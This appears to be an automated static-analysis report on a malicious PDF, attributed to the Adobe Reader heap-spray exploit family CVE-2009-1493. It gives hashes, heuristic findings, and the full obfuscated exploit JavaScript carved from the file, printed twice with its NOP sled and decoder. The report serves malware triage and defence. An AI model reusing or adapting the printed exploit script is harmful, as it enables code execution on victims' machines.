Malicious PDF — malware analysis report

Static analysis result for SHA-256 506063876cdbfed5…

MALICIOUS

PDF

3.5 KB Created: 2008-09-07 22:47:39 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12; modified using iText 2.1.7 by 1T3XT) First seen: 2026-05-09
MD5: ef26263a473a340a1984cdfe56f9dacc SHA-1: b1dd9adabc06bdfc50507ec86455b29baf8a4410 SHA-256: 506063876cdbfed5c55a59d517157bce7ba5977b2245e57d5e8bcfbe2ba47292
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged by an ML classifier as malicious with high probability. Static analysis revealed embedded JavaScript streams, some of which exhibit obfuscation techniques such as string concatenation and the use of String.fromCharCode; the heap-spray heuristic below additionally pairs a NOP-sled spray with the removed Adobe Reader API spell.customDictionaryOpen (CVE-2009-1493). These scripts are likely responsible for downloading and executing a second-stage payload, as indicated by the heuristic firings and the presence of obfuscated JavaScript artifacts. The specific intent of the scripts could not be fully determined because of the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (a NOP-sled or shellcode nybble sled, or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink spell.customDictionaryOpen, associated with CVE-2009-1493. Benign documents never pair heap-spray staging with these long-removed APIs. Because the exact malformed argument is assembled at run time, this rule attributes the exploit to a known pre-2011 Reader CVE family rather than to the exact primitive.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript on its own remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    <</Length 4699>>stream
    Dge3=unescape;ZIH7=eval;var e2comxCBqv; var arry = new Array();  function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; }  function n2lbxFRP(zeDMLD5frG) { ZIH7(Rml0('dyt7ZE8dQu#=#Wtv6("*f5656")@'));  var rnpYjm6yK = 0x400000; var qBA9mGHA27 = wbg2AV1wJf.length * 2; var mYElRxzI = rnpYjm6yK - (qBA9mGHA27 + 0x38); var li0FOx2smh = Dge3("%u9090%u9090"); li0FOx2smh = kCCcRxkpD(li0FOx2smh, mYElRxzI); var jGg35eYFr = (i4OIQMm1N …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active or exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are a common parser-evasion technique and serve as supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x352 2011 bytes
SHA-256: 11f80de48d734fed06c41582df98b48fe9c1ace0a18d5ba0b5126476b3c8dc07
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Dge3=unescape;ZIH7=eval;var e2comxCBqv; var arry = new Array();  function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; }  function n2lbxFRP(zeDMLD5frG) { ZIH7(Rml0('dyt7ZE8dQu#=#Wtv6("*f5656")@'));  var rnpYjm6yK = 0x400000; var qBA9mGHA27 = wbg2AV1wJf.length * 2; var mYElRxzI = rnpYjm6yK - (qBA9mGHA27 + 0x38); var li0FOx2smh = Dge3("%u9090%u9090"); li0FOx2smh = kCCcRxkpD(li0FOx2smh, mYElRxzI); var jGg35eYFr = (i4OIQMm1NE - 0x400000) / rnpYjm6yK; for(var uNDuvIksm = 0; uNDuvIksm < jGg35eYFr; uNDuvIksm++) { gG7kzCEt[uNDuvIksm] = li0FOx2smh + wbg2AV1wJf; } } function viB7XF4GK() { app.clearTimeOut(e2comxCBqv);  if(spell.customDictionaryOpen()) { ZIH7(Rml0('ezi#dyt7ZE8dQu#=#Wtv6("*f5656")@')); var hWq500CN = wbg2AV1wJf.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = Dge3("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){arry[vqcQD96y] = yarsp + wbg2AV1wJf;} var tUMhNbGw = Dge3("%09"); while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw; tUMhNbGw = "N." 
+ tUMhNbGw; ZIH7(Rml0('zkk.wlx.Xloozy.tvgRxlm(gFNsMyTd)@')); } } app.rAiDs74Nu6 = viB7XF4GK; e2comxCBqv = app.setTimeOut("app.rAiDs74Nu6()", 10);  function Ducc(arZ7, XpY3, bhD5) { var iIyw; iIyw=arZ7.split(XpY3); var Lxe2=iIyw.join(bhD5); return Lxe2;/**/ } function Rml0(Mqo5) { Mqo5 = Ducc(Mqo5,"##+##","'"); Mqo5 = Ducc(Mqo5,"##|##","\\"); Lxe2=""; frt8 =""; for(k=0;k<Mqo5.length;k++) { Lxe2 = Mqo5.charCodeAt(k); if (Lxe2==32){Lxe2=35} else if (Lxe2==35){Lxe2=32} else if (Lxe2==59){Lxe2=64} else if (Lxe2==64){Lxe2=59} else if (Lxe2==37){Lxe2=42} else if (Lxe2==42){Lxe2=37} else if (Lxe2>=97 && Lxe2<=122) { Lxe2=Lxe2-97;Lxe2=25-Lxe2;Lxe2+=97; }else if (Lxe2>=65 && Lxe2<=90) { Lxe2=Lxe2-65;Lxe2=25-Lxe2;Lxe2+=65; }else if (Lxe2>=48 && Lxe2<=57) { Lxe2=Lxe2-48;Lxe2=9-Lxe2;Lxe2+=48; } frt8 += String.fromCharCode(Lxe2); } return frt8;/**/ }
javascript_obj0013_002.js pdf-javascript-stream PDF /JS object 13 at offset 0x372 2707 bytes
SHA-256: e62e086026b18630ec987cb580ca4d910e02ca523981a51b983af93607fc5ccf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Dge3=unescape;ZIH7=eval;var e2comxCBqv; var arry = new Array();  function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; }  function n2lbxFRP(zeDMLD5frG) { ZIH7(Rml0('dyt7ZE8dQu#=#Wtv6("*f5656")@'));  var rnpYjm6yK = 0x400000; var qBA9mGHA27 = wbg2AV1wJf.length * 2; var mYElRxzI = rnpYjm6yK - (qBA9mGHA27 + 0x38); var li0FOx2smh = Dge3("%u9090%u9090"); li0FOx2smh = kCCcRxkpD(li0FOx2smh, mYElRxzI); var jGg35eYFr = (i4OIQMm1NE - 0x400000) / rnpYjm6yK; for(var uNDuvIksm = 0; uNDuvIksm < jGg35eYFr; uNDuvIksm++) { gG7kzCEt[uNDuvIksm] = li0FOx2smh + wbg2AV1wJf; } } function viB7XF4GK() { app.clearTimeOut(e2comxCBqv);  if(spell.customDictionaryOpen()) { ZIH7(Rml0('ezi#dyt7ZE8dQu#=#Wtv6("*f5656")@')); var hWq500CN = wbg2AV1wJf.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = Dge3("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){arry[vqcQD96y] = yarsp + wbg2AV1wJf;} var tUMhNbGw = Dge3("%09"); while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw; tUMhNbGw = "N." 
+ tUMhNbGw; ZIH7(Rml0('zkk.wlx.Xloozy.tvgRxlm(gFNsMyTd)@')); } } app.rAiDs74Nu6 = viB7XF4GK; e2comxCBqv = app.setTimeOut("app.rAiDs74Nu6()", 10);  function Ducc(arZ7, XpY3, bhD5) { var iIyw; iIyw=arZ7.split(XpY3); var Lxe2=iIyw.join(bhD5); return Lxe2;/**/ } function Rml0(Mqo5) { Mqo5 = Ducc(Mqo5,"##+##","'"); Mqo5 = Ducc(Mqo5,"##|##","\\"); Lxe2=""; frt8 =""; for(k=0;k<Mqo5.length;k++) { Lxe2 = Mqo5.charCodeAt(k); if (Lxe2==32){Lxe2=35} else if (Lxe2==35){Lxe2=32} else if (Lxe2==59){Lxe2=64} else if (Lxe2==64){Lxe2=59} else if (Lxe2==37){Lxe2=42} else if (Lxe2==42){Lxe2=37} else if (Lxe2>=97 && Lxe2<=122) { Lxe2=Lxe2-97;Lxe2=25-Lxe2;Lxe2+=97; }else if (Lxe2>=65 && Lxe2<=90) { Lxe2=Lxe2-65;Lxe2=25-Lxe2;Lxe2+=65; }else if (Lxe2>=48 && Lxe2<=57) { Lxe2=Lxe2-48;Lxe2=9-Lxe2;Lxe2+=48; } frt8 += String.fromCharCode(Lxe2); } return frt8;/**/ } 

endstream
endobj
14 0 obj
<</Creator(Scribus 1.3.3.12)/Title<>/Producer(Scribus PDF Library 1.3.3.12; modified using iText 2.1.7 by 1T3XT)/Author<>/Keywords<>/Trapped/False/ModDate(D:20091014160541+08'00')/CreationDate(D:20080907224739)>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000242 00000 n 
0000000260 00000 n 
0000000302 00000 n 
0000000381 00000 n 
0000000410 00000 n 
0000000430 00000 n 
0000000468 00000 n 
0000000528 00000 n 
0000000679 00000 n 
0000000727 00000 n 
0000000806 00000 n 
0000000850 00000 n 
0000005593 00000 n 
trailer
<</Info 14 0 R/Root 1 0 R/Size 15/ID [<cb1ea88230e04faa2692ffde7e8ddedc><f43c5f9abe76c261193b22615be36de0>]>>
startxref
5822
%%EOF